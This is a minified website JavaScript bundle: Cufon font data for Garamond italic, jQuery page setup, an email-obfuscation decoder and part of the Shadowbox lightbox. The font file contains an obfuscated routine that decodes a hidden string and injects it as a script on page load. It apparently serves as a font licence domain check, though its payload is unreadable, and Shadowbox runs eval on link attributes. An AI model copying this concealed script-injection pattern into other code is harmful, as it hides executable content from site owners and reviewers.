13r-89,100r-8,186r-20,303r312,-351r87,-92r466,-534v49,-65,64,-63,78,-123v-39,-17,-80,-19,-132,-31r0,-31r79,-6r250,0r-3,39v-53,19,-90,36,-110,54v-156,144,-486,532,-661,729r-225,253r-240,263r-45,-2v-1,-104,22,-343,23,-491v-10,8,-60,61,-79,83r-330,379v-5,6,-16,16,-31,31r-51,3r18,-717r12,-355v3,-39,5,-63,5,-70","w":1813,"k":{"\u00e5":104,"\u00d6":-25,"\u00c5":180,"\u00c4":180,"y":27,"u":102,"r":78,"o":129,"i":-76,"h":-76,"e":104,"d":154,"a":154,"O":-25,"G":-25,"A":180,":":-25,".":51,",":51}},{"d":"53,-104v-1,-38,24,-67,62,-67v33,0,59,26,82,77v18,40,25,63,68,63v58,0,115,-54,112,-132v-3,-81,-86,-290,-82,-362v9,-156,86,-293,258,-293v69,0,124,43,125,106v1,35,-23,66,-54,67v-48,11,-104,-82,-126,-92v-53,-25,-108,21,-108,76v0,97,102,354,96,450v-8,134,-129,224,-266,229v-96,3,-164,-43,-167,-122","w":597,"k":{".":27,",":51}},{"d":"209,-69v-147,-195,-121,-518,-10,-769v76,-172,155,-294,243,-360v88,-66,175,-99,260,-99v75,0,135,28,178,84v57,74,85,189,85,344v1,307,-161,657,-364,811v-132,100,-294,119,-392,-11xm850,-1028v0,-122,-34,-223,-151,-223v-67,0,-125,38,-188,101v-119,121,-273,607,-273,863v0,102,14,171,41,207v73,92,199,57,272,-28v71,-83,144,-240,214,-477v57,-191,85,-339,85,-443","w":960},{"w":512},{"d":"59,-14r34,-252v12,0,23,1,34,4v5,93,32,165,79,218v96,72,304,38,369,-30v44,-46,109,-142,83,-255v-48,-206,-172,-356,-233,-563v-22,-74,-12,-177,21,-239v37,-70,132,-148,204,-170v144,-43,284,-16,422,39v-3,82,-29,155,-50,212v-13,0,-24,-1,-33,-3v-5,-68,-21,-169,-81,-204v-31,-18,-64,-31,-103,-31v-148,-2,-252,99,-246,247v7,163,37,174,123,353v51,107,99,197,119,316v64,381,-403,470,-742,358","w":1024,"k":{"H":-127,".":-76,",":-51}},{"d":"375,-52v34,40,107,32,181,32v241,0,484,2,633,-116v49,-38,89,-94,119,-170v12,0,21,-1,31,2v-7,33,-36,136,-87,311r-627,10r-408,-2v-73,4,-148,-2,-222,1r-1,-31r93,-4v53,-6,80,-10,136,-24v3,-11,6,-26,9,-43v36,-177,58,-304,72,-379r62,-339v2,-8,6,-41,15,-99v16,-102,44,-181,48,-301v-10,-57,-40,-40,-132,-52r-64,-4v1,-12,3,-24,7,-37r354,1r704,-8r82,3v-3,29,-28,183,-47,222v-10,-1,-18,-6,-25,-13v-19,-77,-5,-111,-26,-163v-163,-22,-340,-2,-522,-2v-68,0,-132,-4,-180,24r-87,501v-1,9,-2,19,-3,30v24,-8,591,-35,582,-41v26,-7,46,-17,60,-31v14,-14,40,-61,77,-141r38,-5r-88,431v-12,-1,-24,-2,-35,-2v-1,-28,9,-47,7,-94v-3,-93,-18,-108,-113,-108v-47,0,-102,9,-167,14v-58,4,-193,8,-280,16r-87,8r-113,547v-3,25,-6,35,4,56xm1143,-1722v37,-21,97,-8,96,36v0,29,-27,62,-82,100r-232,164r-18,-1v0,-2,180,-256,180,-252v18,-21,37,-36,56,-47","w":1408},{"d":"450,-794v99,-51,197,25,197,129v0,72,-48,159,-90,187v-57,37,-71,57,-158,80v-41,11,-93,24,-157,37v-22,61,-33,122,-33,184v0,82,48,167,128,128v82,-39,131,-116,166,-207v15,0,26,0,41,2v-20,75,-69,148,-148,220v-49,45,-100,67,-153,67v-178,0,-151,-313,-91,-449v40,-91,84,-173,144,-244v80,-95,76,-94,154,-134xm575,-711v2,-34,-25,-67,-55,-67v-18,0,-38,11,-64,31v-63,48,-171,241,-197,336v148,-20,310,-120,316,-300","w":597,"k":{"z":27,"v":-25,"p":-25,"g":27,"b":27,",":27}},{"d":"561,-819v117,0,166,102,166,251v0,155,-47,292,-141,412v-94,120,-190,180,-291,180v-200,0,-210,-267,-142,-450v36,-97,78,-162,133,-230v60,-76,155,-163,275,-163xm651,-681v0,-49,-28,-91,-69,-91v-39,0,-79,25,-123,69v-107,106,-244,394,-252,590v-5,111,122,105,186,44v89,-85,258,-447,258,-612xm472,-1014v-44,0,-81,-38,-81,-83v0,-42,38,-80,81,-80v44,0,81,37,81,81v0,44,-38,82,-81,82xm725,-1097v0,-42,38,-79,81,-79v44,0,82,38,82,81v0,44,-38,82,-82,82v-45,0,-81,-38,-81,-84","w":725,"k":{"z":51,"y":27,"x":53}},{"d":"749,5v-150,0,-307,4,-460,1r7,-30r189,-30v38,-13,33,-32,50,-83v40,-122,105,-424,113,-478v-43,-74,-252,-513,-315,-616v-25,-42,-25,-20,-125,-39v-28,-5,-49,-4,-60,-6v-4,-12,-1,-34,-1,-41v59,-2,131,16,191,14r318,-10v5,19,7,21,3,39r-138,23v-20,7,-27,18,-18,36r49,98v92,176,114,279,221,441v130,-131,209,-207,235,-230v26,-23,53,-50,82,-80v54,-59,202,-168,202,-232v0,-15,-7,-26,-20,-34v-31,-21,-110,-27,-184,-27v-2,-14,-1,-19,4,-34r156,-1v101,9,206,0,309,-3r-2,40v-64,17,-129,30,-173,67v-45,39,-148,140,-185,175r-392,377r-99,425v-13,47,-19,90,-19,130v0,93,116,55,203,73v3,14,2,16,-2,31v-33,3,-79,4,-139,4","w":1323,"k":{"\u00e5":205,"\u00d6":51,"\u00c5":205,"\u00c4":205,"v":180,"u":180,"q":231,"p":154,"o":231,"i":78,"e":205,"d":205,"a":205,"S":51,"O":51,"G":53,"C":102,"A":205,";":27,".":129,"-":27,",":129}},{"d":"416,-816v54,0,99,48,99,103v0,37,-12,73,-45,97v-71,53,-164,-9,-164,-89v0,-59,51,-111,110,-111xm189,-242v71,0,112,97,110,175v-4,174,-152,327,-288,389r-11,-40v9,-8,21,-17,36,-27v105,-77,157,-145,157,-206v0,-56,-93,-86,-93,-155v0,-46,33,-136,89,-136","w":448},{"d":"391,0r109,-380r-467,0r9,-75r813,-839r53,0r-240,825r240,0r-22,89r-244,0r-108,380r-143,0xm526,-469r168,-586r-564,586r396,0","w":960},{"d":"335,-141v-56,87,65,101,138,115v-2,10,-5,21,-8,32v-74,6,-184,-15,-248,-11r-169,10v-30,5,-53,7,-69,7r0,-37v94,-31,221,-99,279,-147r178,-146v52,-38,228,-196,312,-264r55,-48r-57,-89r-93,-161r-103,-170v-38,-68,-81,-161,-154,-203v-27,-15,-122,-25,-180,-34r-2,-36r217,5v53,-5,150,3,180,2r112,-2r96,3r1,36v-96,2,-159,8,-186,25v-38,24,-17,37,5,85r169,300v42,74,73,125,92,153v18,-14,395,-348,425,-388v48,-64,66,-65,76,-113v0,-13,-5,-22,-15,-29v-23,-15,-70,-28,-141,-39v0,-13,1,-17,5,-32r161,-2v31,6,172,8,281,11r-1,39v-112,9,-267,136,-351,216r-115,110r-302,266v47,87,106,188,175,303v56,94,96,157,119,192v39,61,75,107,159,138v28,11,50,22,67,32v1,11,1,17,-1,30v-69,-1,-185,-22,-273,-22v-31,0,-116,3,-255,8v-1,-21,-1,-24,0,-45v73,-9,163,-3,176,-67v0,-18,-9,-43,-27,-76v-74,-139,-163,-277,-244,-407v-92,63,-438,379,-484,450","w":1515,"k":{"\u00d6":78,"O":78,"G":51,"C":78}},{"d":"-441,406v2,-52,65,-61,109,-34v15,4,63,65,86,72v93,29,230,-42,282,-84v70,-56,185,-155,226,-272v59,-172,73,-367,58,-608v-6,-97,-7,-138,-43,-180v-20,-15,-48,-7,-63,12v-23,29,-46,83,-69,163v-13,4,-19,0,-33,-9v37,-143,51,-184,104,-252v10,-12,39,-32,71,-32v39,0,70,25,93,75v88,182,35,567,-7,761v127,-186,233,-375,243,-673v2,-71,-20,-160,51,-160v37,0,51,20,51,60v0,153,-156,549,-218,647v-90,142,-182,274,-291,387v-114,118,-264,219,-442,219v-80,0,-135,-10,-164,-30v-29,-20,-44,-41,-44,-62","w":683,"k":{"\u00f6":27,"\u00e5":27,"\u00e4":27,"o":27,"g":27,"e":27,"d":27,"c":27,"a":27,".":51,",":78}},{"d":"418,7v-119,-13,-263,7,-354,7v-16,0,-32,-2,-49,-5v3,-15,8,-28,15,-37v52,-13,160,3,207,-21v37,-108,38,-199,94,-531v20,-116,26,-204,34,-262v15,-102,33,-206,44,-313v6,-53,12,-91,-30,-105v-14,-5,-72,-10,-175,-15r1,-34r109,0v305,20,697,-14,1015,3v-10,80,-30,143,-50,214r-33,-3v-3,-50,-12,-133,-36,-151v-21,-16,-61,-23,-117,-22r-367,6v-75,1,-129,4,-162,11r-64,496v110,15,268,2,385,2v56,0,95,5,144,-9r74,-161v16,-2,20,-2,33,-2v-11,142,-36,270,-52,406r-35,7v-10,-61,1,-156,-34,-189v-110,-20,-299,1,-437,-5r-88,5r-90,596v-3,21,-5,40,-5,57v75,25,146,23,209,27v3,17,3,19,-1,36v-79,-3,-99,2,-185,-8","w":1173,"k":{"\u00f6":129,"\u00e5":180,"\u00e4":180,"\u00c5":205,"\u00c4":205,"r":129,"o":129,"l":102,"e":129,"a":180,"A":205,".":129,",":154}},{"d":"188,29v-56,0,-104,-53,-104,-110v0,-56,52,-110,108,-110v57,0,100,50,100,109v0,59,-47,111,-104,111","w":448},{"d":"168,8v-34,21,-90,28,-90,-22v0,-67,29,-100,64,-170r171,-337r70,-149v16,-32,27,-36,12,-62v-22,9,-51,38,-93,77v-34,31,-78,76,-107,105r-32,-7v36,-59,176,-201,250,-241v48,-26,118,-34,118,21v0,28,-21,55,-32,91v-20,66,-277,522,-285,608v17,-3,41,-17,70,-42v115,-97,167,-152,244,-234v157,-168,203,-225,317,-463v36,-3,65,-9,82,13v-14,42,-40,111,-79,206r-186,464v-11,24,-19,46,-22,66r7,1v63,-36,119,-116,161,-168r32,5v-32,61,-84,129,-162,198v-58,50,-73,69,-133,52v-12,-13,-18,-25,-18,-36v0,-33,14,-82,41,-146r149,-349r-79,90v-170,195,-270,309,-470,429xm531,-1149v-41,-36,-39,-103,21,-105v79,14,84,43,150,124v68,84,110,148,134,185r-18,0v-172,-116,-266,-185,-287,-204","w":875},{"d":"528,21v-185,-32,-360,-22,-548,-19r0,-36v92,-18,227,3,248,-94r83,-381r50,-283v10,-65,34,-121,37,-220v15,-61,28,-131,28,-201v0,-12,-4,-20,-13,-25v-19,-11,-86,-24,-201,-40r9,-32r369,-1r129,189r70,110r451,725v26,48,53,95,82,141v9,-41,12,-85,21,-130v25,-129,43,-216,49,-260r63,-436v15,-139,36,-175,14,-256v-14,-17,-150,-38,-206,-49v-3,-15,-3,-19,-3,-32v170,7,346,19,513,3v-3,15,-7,30,-12,44v-121,16,-164,8,-209,42v-37,112,-64,309,-80,420r-39,273r-70,408v-14,89,-21,142,-22,157r-55,-1v-13,-25,-29,-52,-47,-79r-319,-502r-72,-108r-228,-359r-136,-200r-129,694r-24,178v-7,81,-35,168,-37,241v0,8,4,17,13,26v83,31,107,26,230,58","w":1600,"k":{"\u00c5":51,"\u00c4":51,"A":51,".":27,",":51}},{"d":"586,-1374r448,538r-65,53r-383,-461r-384,461r-63,-53","w":1024},{"d":"759,-1030v56,-112,-61,-230,-166,-225v-120,5,-172,52,-209,170v-24,2,-28,3,-50,1v20,-128,119,-219,263,-218v145,1,261,107,256,265v-3,101,-46,169,-99,227v-27,29,-303,210,-351,258v-42,41,-84,83,-88,156v-3,60,53,92,101,92v70,0,114,-87,134,-142v11,1,22,5,31,13v0,82,-93,176,-174,176v-82,0,-156,-87,-153,-176v5,-119,56,-193,125,-265v36,-38,273,-204,308,-238v31,-31,56,-62,72,-94xm310,25v-50,0,-84,-49,-84,-108v0,-59,50,-115,103,-115v45,0,82,49,82,99v0,61,-47,124,-101,124","w":747},{"d":"372,-94v-2,59,132,39,167,62v-2,19,0,33,-4,45v-17,0,-57,-7,-119,-9v-136,-5,-258,-8,-390,8r0,-40v87,-17,164,-9,199,-56v32,-98,47,-147,81,-354r40,-245r46,-253r4,-39v29,-137,44,-224,44,-261v-18,-56,-139,-20,-203,-36v1,-8,5,-23,12,-44v173,7,338,13,509,-1v146,-12,278,76,340,149v50,58,96,169,71,274v-22,91,-47,157,-113,213v-65,55,-140,105,-247,124v-122,22,-173,4,-257,-12v0,-12,1,-14,5,-31v28,3,96,10,145,2v110,-17,165,-68,225,-123v78,-74,134,-247,65,-377v-62,-118,-141,-175,-325,-174v-24,0,-48,3,-73,9v-14,35,-21,96,-30,143r-91,505r-54,255","w":1088,"k":{"\u00e5":102,"\u00c5":180,"\u00c4":180,"o":27,"e":27,"a":102,"A":180,".":129,",":154}},{"d":"394,-1197v0,-54,-116,-41,-157,-58r15,-53v171,22,301,8,498,-3v3,22,4,24,2,44v-19,9,-195,16,-192,45v-50,140,-90,442,-118,623v-30,194,-43,227,-17,368v13,71,52,122,103,153v102,61,196,71,311,51v248,-44,326,-129,391,-363v20,-72,107,-604,107,-755v0,-95,-101,-121,-197,-127v-2,-14,0,-23,4,-42v153,14,300,12,461,4r1,39v-28,6,-129,26,-146,39v-49,37,-68,95,-79,181r-43,338v-42,235,-69,510,-233,637v-91,71,-254,118,-432,102v-242,-22,-412,-120,-412,-378v0,-220,38,-292,83,-544r47,-266v2,-14,3,-26,3,-35","w":1472,"k":{"\u00c5":102,"\u00c4":102,"A":102,".":102,",":102}},{"d":"498,-748v95,-48,200,-48,246,38r108,-345r24,-88v15,-64,37,-78,8,-108v-17,-18,-71,-31,-112,-42r8,-28v125,1,185,-11,238,-24v8,0,17,1,26,4v-25,105,-63,196,-94,295r-136,441v-49,188,-116,353,-172,533r3,6v24,-4,85,-60,184,-169v11,5,19,11,24,18v-55,83,-116,153,-186,202v-62,43,-83,64,-133,51v-17,-38,4,-67,28,-155v20,-73,38,-125,47,-158v-77,78,-192,208,-288,266v-54,32,-100,52,-143,52v-68,0,-87,-74,-87,-149v0,-147,59,-243,131,-362v67,-113,169,-224,276,-278xm211,-152v-4,51,29,90,76,90v27,0,58,-12,93,-37v121,-83,256,-253,302,-405v23,-75,35,-119,35,-133v0,-36,-41,-92,-71,-90v-83,6,-146,50,-200,115v-75,91,-224,310,-235,460","k":{"v":-25,"p":-25}},{"d":"454,-1304v106,-53,205,6,205,138v0,170,-147,361,-295,362v-133,0,-151,-157,-102,-277v39,-96,108,-181,192,-223xm585,-1232v-2,-68,-60,-53,-100,-14v-66,65,-161,241,-165,354v-2,61,65,52,99,23v54,-45,169,-266,166,-363","w":469}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+86-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("|oDO1rH:,^!5|u0N~rJmPoP!&SHODr!5&Svm,^yQDq-_X[:i&fjw4o46&fjw4oqi1qYO4ekiD`y8~(>wXSH8~(>wD(08~(>wD{v8~(>wD^D8~(>wDrv8~(>wX[J8~(>wDek8~(>wX^q8~(>wD{q8~(>wDea8~(>wX(~8~(>wX(Kb&fjw4oP:&fjw4oq{&qYO4ek0XqYO4ek0D(O8~(>wDeD8~(>wX(H8~(>wD(v8~(>wXrv8~(>wD(k8~(>wDe~8~(>wD{yY&fjw4oAS~JYO4ekaXqYO4ek`4OYO4ek0HJYO4ek`D0wi,o~8~(>wDe08~(>wD(J8~(>wDoq8~(>wDrJ8~(>wDoH8~(>wD{KY&fjw4oD`&fjw4oD{^OYO4eki+JYO4ek{40YO4ek{X0YO4ek{HqYO4ekaDJYO4ekr4eaP&fjw4oAO&fjw4oj6,Ua8~(>wX{H8~(>wDeJ8~(>wX{q)&fjw4oya40YO4ekrDqYO4eki4{V8~(>wD{AS&fjw4oJ{&fjw4oPYUiq4jqYO4ek`HqYO4eki+jv8~(>wXSJ8~(>wX^D8~(>wXSqe&OYO4ek{HJYO4eki4uJ8~(>wX[H8~(>wD(q3&fjw4oPS&fjw4o4w&fjw4oDr&fjw4oH`&fjw4oAw80YO4eka40w)&fjw4oHrcew{&fjw4oj[yUDW&fjw4oJi9[*S+qYO4eka4qY8&fjw4og:XuV8~(>wXry8~(>wD{~bUqYO4ekiDj8_|qYO4ekiXOYO4ek`40YO4ekiHSw[vov8~(>wX(y!qe.>&fjw4oq`(OYO4ek0HiOk^0YO4ek{H0YO4ek`Xr>kueAJofPv|W4H+pgyU(jq^&XD,18~9cKai{`0rQtVIs_.5)wYm[:OSb6*TN-!3L4s9{q8~(>wX(0s8oV8~(>wX[~a9u~rq0YO4ek0HOYO4ek`Do*O&fjw4oX[(qv&8[>KjOYO4ek{+^q8~(>wD{DD&fjw4[~0HJa*yi*8~(>wD{0+&{!gq^y8~(>wXrAiWQHw1o0:|uPi|UYVp(>_8eOiWQ>_1eOwWrY01r~:,uYQp^P5Di*Q1f0w,f4!9b:N,^XtXi*),[:)&iKL+Q~b~Ow5|(-tp[t5|Ow5XrYODr!mXSq8WrJ:cu6s&u*Q1Sq[8SY8WrH)1&w5|Ow5Db~a1rytX&q[&u*{1S:Vvu!VWQy08bgt1o!{X&yV1S65,o![~o*a1^jV|^D)8iKN,(Y_+m_s,U0Q^SH1,qO~p&k1,qO!|UKV")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":832,"face":{"font-family":"Garamond italic","font-weight":400,"font-style":"italic","font-stretch":"normal","units-per-em":"2048","panose-1":"2 2 4 4 3 3 1 1 8 3","ascent":"1638","descent":"-410","x-height":"24","cap-height":"18","bbox":"-445.184 -1765 2056 525.03","underline-thickness":"102","underline-position":"-103","slope":"-12","unicode-range":"U+0020-U+00FF"}}));;
// ---- 665ac4d348_minify_page.js
$(document).ready(function(){Cufon.replace('.frame_border_both h1',{fontFamily:'Garamond regular'});Cufon.replace('.layout_home .rgslideshow .rgsnest .rgstitle',{fontFamily:'Garamond regular'});Cufon.replace('.frame_border_both h1',{fontFamily:'Garamond regular'});Cufon.replace('.skin-slidedeck dl.slidedeck dt .title',{fontFamily:'Garamond regular'});Cufon.replace('h1.graphical',{fontFamily:'Garamond italic'});Cufon.replace('span.headline.graphical',{fontFamily:'Garamond italic'});changeMaps('map_europa');});$(document).ready(function(){changeMaps('map_europa');resizeStage();});$(window).resize(function(){resizeStage();});function resizeStage(){if($(window).height()>$('#stage').height()){$('#stage').height($(window).height());}else{$('#stage').height('auto');}}
function changeMaps(mapName){var imageSelector='#footer img[usemap=#'+mapName+']';var origin=$(imageSelector).attr('src');$('#'+mapName+' area').mouseover(function(){var file=$(this).attr('rel');if(file){$(imageSelector).attr('src',file);}}).mouseout(function(){$(imageSelector).attr('src',origin);});};
// ---- 6d66685715_minify_javascript_04b8fee87d.js
var browserName=navigator.appName;var browserVer=parseInt(navigator.appVersion);var version="";var msie4=(browserName=="Microsoft Internet Explorer"&&browserVer>=4);if((browserName=="Netscape"&&browserVer>=3)||msie4||browserName=="Konqueror"||browserName=="Opera"){version="n3";}else{version="n2";}
function blurLink(theObject){if(msie4){theObject.blur();}}
function decryptCharcode(n,start,end,offset){n=n+offset;if(offset>0&&n>end){n=start+(n-end-1);}else if(offset<0&&n<start){n=end-(start-n-1);}
return String.fromCharCode(n);}
function decryptString(enc,offset){var dec="";var len=enc.length;for(var i=0;i<len;i++){var n=enc.charCodeAt(i);if(n>=0x2B&&n<=0x3A){dec+=decryptCharcode(n,0x2B,0x3A,offset);}else if(n>=0x40&&n<=0x5A){dec+=decryptCharcode(n,0x40,0x5A,offset);}else if(n>=0x61&&n<=0x7A){dec+=decryptCharcode(n,0x61,0x7A,offset);}else{dec+=enc.charAt(i);}}
return dec;}
function linkTo_UnCryptMailto(s){location.href=decryptString(s,-10);};
// ---- 09cd4e254f_minify_shadowbox.js
(function(window,undefined){var S={version:"3.0.3"}
var ua=navigator.userAgent.toLowerCase();if(ua.indexOf('windows')>-1||ua.indexOf('win32')>-1){S.isWindows=true;}else if(ua.indexOf('macintosh')>-1||ua.indexOf('mac os x')>-1){S.isMac=true;}else if(ua.indexOf('linux')>-1){S.isLinux=true;}
S.isIE=ua.indexOf('msie')>-1;S.isIE6=ua.indexOf('msie 6')>-1;S.isIE7=ua.indexOf('msie 7')>-1;S.isGecko=ua.indexOf('gecko')>-1&&ua.indexOf('safari')==-1;S.isWebKit=ua.indexOf('applewebkit/')>-1;var inlineId=/#(.+)$/,galleryName=/^(light|shadow)box\[(.*?)\]/i,inlineParam=/\s*([a-z_]*?)\s*=\s*(.+)\s*/i,fileExtension=/[0-9a-z]+$/i,scriptPath=/(.+\/)shadowbox\.js/i;var open=false,initialized=false,lastOptions={},slideDelay=0,slideStart,slideTimer;S.current=-1;S.dimensions=null;S.ease=function(state){return 1+Math.pow(state-1,3);}
S.errorInfo={fla:{name:"Flash",url:"http://www.adobe.com/products/flashplayer/"},qt:{name:"QuickTime",url:"http://www.apple.com/quicktime/download/"},wmp:{name:"Windows Media Player",url:"http://www.microsoft.com/windows/windowsmedia/"},f4m:{name:"Flip4Mac",url:"http://www.flip4mac.com/wmv_download.htm"}};S.gallery=[];S.onReady=noop;S.path=null;S.player=null;S.playerId="sb-player";S.options={animate:true,animateFade:true,autoplayMovies:true,continuous:false,enableKeys:true,flashParams:{bgcolor:"#000000",allowfullscreen:true},flashVars:{},flashVersion:"9.0.115",handleOversize:"resize",handleUnsupported:"link",onChange:noop,onClose:noop,onFinish:noop,onOpen:noop,showMovieControls:true,skipSetup:false,slideshowDelay:0,viewportPadding:20};S.getCurrent=function(){return S.current>-1?S.gallery[S.current]:null;}
S.hasNext=function(){return S.gallery.length>1&&(S.current!=S.gallery.length-1||S.options.continuous);}
S.isOpen=function(){return open;}
S.isPaused=function(){return slideTimer=="pause";}
S.applyOptions=function(options){lastOptions=apply({},S.options);apply(S.options,options);}
S.revertOptions=function(){apply(S.options,lastOptions);}
S.init=function(options,callback){if(initialized)
return;initialized=true;if(S.skin.options)
apply(S.options,S.skin.options);if(options)
apply(S.options,options);if(!S.path){var path,scripts=document.getElementsByTagName("script");for(var i=0,len=scripts.length;i<len;++i){path=scriptPath.exec(scripts[i].src);if(path){S.path=path[1];break;}}}
if(callback)
S.onReady=callback;bindLoad();}
S.open=function(obj){if(open)
return;var gc=S.makeGallery(obj);S.gallery=gc[0];S.current=gc[1];obj=S.getCurrent();if(obj==null)
return;S.applyOptions(obj.options||{});filterGallery();if(S.gallery.length){obj=S.getCurrent();if(S.options.onOpen(obj)===false)
return;open=true;S.skin.onOpen(obj,load);}}
S.close=function(){if(!open)
return;open=false;if(S.player){S.player.remove();S.player=null;}
if(typeof slideTimer=="number"){clearTimeout(slideTimer);slideTimer=null;}
slideDelay=0;listenKeys(false);S.options.onClose(S.getCurrent());S.skin.onClose();S.revertOptions();}
S.play=function(){if(!S.hasNext())
return;if(!slideDelay)
slideDelay=S.options.slideshowDelay*1000;if(slideDelay){slideStart=now();slideTimer=setTimeout(function(){slideDelay=slideStart=0;S.next();},slideDelay);if(S.skin.onPlay)
S.skin.onPlay();}}
S.pause=function(){if(typeof slideTimer!="number")
return;slideDelay=Math.max(0,slideDelay-(now()-slideStart));if(slideDelay){clearTimeout(slideTimer);slideTimer="pause";if(S.skin.onPause)
S.skin.onPause();}}
S.change=function(index){if(!(index in S.gallery)){if(S.options.continuous){index=(index<0?S.gallery.length+index:0);if(!(index in S.gallery))
return;}else{return;}}
S.current=index;if(typeof slideTimer=="number"){clearTimeout(slideTimer);slideTimer=null;slideDelay=slideStart=0;}
S.options.onChange(S.getCurrent());load(true);}
S.next=function(){S.change(S.current+1);}
S.previous=function(){S.change(S.current-1);}
S.setDimensions=function(height,width,maxHeight,maxWidth,topBottom,leftRight,padding,preserveAspect){var originalHeight=height,originalWidth=width;var extraHeight=2*padding+topBottom;if(height+extraHeight>maxHeight)
height=maxHeight-extraHeight;var extraWidth=2*padding+leftRight;if(width+extraWidth>maxWidth)
width=maxWidth-extraWidth;var changeHeight=(originalHeight-height)/originalHeight,changeWidth=(originalWidth-width)/originalWidth,oversized=(changeHeight>0||changeWidth>0);if(preserveAspect&&oversized){if(changeHeight>changeWidth){width=Math.round((originalWidth/originalHeight)*height);}else if(changeWidth>changeHeight){height=Math.round((originalHeight/originalWidth)*width);}}
S.dimensions={height:height+topBottom,width:width+leftRight,innerHeight:height,innerWidth:width,top:Math.floor((maxHeight-(height+extraHeight))/2+padding),left:Math.floor((maxWidth-(width+extraWidth))/2+padding),oversized:oversized};return S.dimensions;}
S.makeGallery=function(obj){var gallery=[],current=-1;if(typeof obj=="string")
obj=[obj];if(typeof obj.length=="number"){each(obj,function(i,o){if(o.content){gallery[i]=o;}else{gallery[i]={content:o};}});current=0;}else{if(obj.tagName){var cacheObj=S.getCache(obj);obj=cacheObj?cacheObj:S.makeObject(obj);}
if(obj.gallery){gallery=[];var o;for(var key in S.cache){o=S.cache[key];if(o.gallery&&o.gallery==obj.gallery){if(current==-1&&o.content==obj.content)
current=gallery.length;gallery.push(o);}}
if(current==-1){gallery.unshift(obj);current=0;}}else{gallery=[obj];current=0;}}
each(gallery,function(i,o){gallery[i]=apply({},o);});return[gallery,current];}
S.makeObject=function(link,options){var obj={content:link.href,title:link.getAttribute("title")||"",link:link};if(options){options=apply({},options);each(["player","title","height","width","gallery"],function(i,o){if(typeof options[o]!="undefined"){obj[o]=options[o];delete options[o];}});obj.options=options;}else{obj.options={};}
if(!obj.player)
obj.player=S.getPlayer(obj.content);var rel=link.getAttribute("rel");if(rel){var match=rel.match(galleryName);if(match)
obj.gallery=escape(match[2]);each(rel.split(';'),function(i,p){match=p.match(inlineParam);if(match){if(match[1]=='options'){obj[match[1]]=eval('('+match[2]+')');}
else{obj[match[1]]=match[2];}}});}
return obj;}
S.getPlayer=function(content){if(content.indexOf("#")>-1&&content.indexOf(document.location.href)==0)
return"inline";var q=content.indexOf("?");if(q>-1)
content=content.substring(0,q);var ext,m=content.match(fileExtension);if(m)
ext=m[0].toLowerCase();if(ext){if(S.img&&S.img.ext.indexOf(ext)>-1)
return"img";if(S.swf&&S.swf.ext.indexOf(ext)>-1)
return"swf";if(S.flv&&S.flv.ext.indexOf(ext)>-1)
return"flv";if(S.qt&&S.qt.ext.indexOf(ext)>-1){if(S.wmp&&S.wmp.ext.indexOf(ext)>-1){return"qtwmp";}else{return"qt";}}
if(S.wmp&&S.wmp.ext.indexOf(ext)>-1)
return"wmp";}
return"iframe";}
function filterGallery(){var err=S.errorInfo,plugins=S.plugins,obj,remove,needed,m,format,replace,inlineEl,flashVersion;for(var i=0;i<S.gallery.length;++i){obj=S.gallery[i]
remove=false;needed=null;switch(obj.player){case"flv":case"swf":if(!plugins.fla)
needed="fla";break;case"qt":if(!plugins.qt)
needed="qt";break;case"wmp":if(S.isMac){if(plugins.qt&&plugins.f4m){obj.player="qt";}else{needed="qtf4m";}}else if(!plugins.wmp){needed="wmp";}
break;case"qtwmp":if(plugins.qt){obj.player="qt";}else if(plugins.wmp){obj.player="wmp";}else{needed="qtwmp";}
break;}
if(needed){if(S.options.handleUnsupported=="link"){switch(needed){case"qtf4m":format="shared";replace=[err.qt.url,err.qt.name,err.f4m.url,err.f4m.name];break;case"qtwmp":format="either";replace=[err.qt.url,err.qt.name,err.wmp.url,err.wmp.name];break;default:format="single";replace=[err[needed].url,err[needed].name];}
obj.player="html";obj.content='<div class="sb-message">'+sprintf(S.lang.errors[format],replace)+'</div>';}else{remove=true;}}else if(obj.player=="inline"){m=inlineId.exec(obj.content);if(m){inlineEl=get(m[1]);if(inlineEl){obj.content=inlineEl.innerHTML;}else{remove=true;}}else{remove=true;}}else if(obj.player=="swf"||obj.player=="flv"){flashVersion=(obj.options&&obj.options.flashVersion)||S.options.flashVersion;if(S.flash&&!S.flash.hasFlashPlayerVersion(flashVersion)){obj.width=310;obj.height=177;}}
if(remove){S.gallery.splice(i,1);if(i<S.current){--S.current;}else if(i==S.current){S.current=i>0?i-1:i;}
--i;}}}
function listenKeys(on){if(!S.options.enableKeys)
return;(on?addEvent:removeEvent)(document,"keydown",handleKey);}
function handleKey(e){if(e.metaKey||e.shiftKey||e.altKey||e.ctrlKey)
return;var code=keyCode(e),handler;switch(code){case 81:case 88:case 27:handler=S.close;break;case 37:handler=S.previous;break;case 39:handler=S.next;break;case 32:handler=typeof slideTimer=="number"?S.pause:S.play;break;}
if(handler){preventDefault(e);handler();}}
function load(changing){listenKeys(false);var obj=S.getCurrent();var player=(obj.player=="inline"?"html":obj.player);if(typeof S[player]!="function")
throw"unknown player "+player;if(changing){S.player.remove();S.revertOptions();S.applyOptions(obj.options||{});}
S.player=new S[player](obj,S.playerId);if(S.gallery.length>1){var next=S.gallery[S.current+1]||S.gallery[0];if(next.player=="img"){var a=new Image();a.src=next.content;}
var prev=S.gallery[S.current-1]||S.gallery[S.gallery.length-1];if(prev.player=="img"){var b=new Image();b.src=prev.content;}}
S.skin.onLoad(changing,waitReady);}
function waitReady(){if(!open)
return;if(typeof S.player.ready!="undefined"){var timer=setInterval(function(){if(open){if(S.player.ready){clearInterval(timer);timer=null;S.skin.onReady(show);}}else{clearInterval(timer);timer=null;}},10);}else{S.skin.onReady(show);}}
function show(){if(!open)
return;S.player.append(S.skin.body,S.dimensions);S.skin.onShow(finish);}
function finish(){if(!open)
return;if(S.player.onLoad)
S.player.onLoad();S.options.onFinish(S.getCurrent());if(!S.isPaused())
S.play();listenKeys(true);}
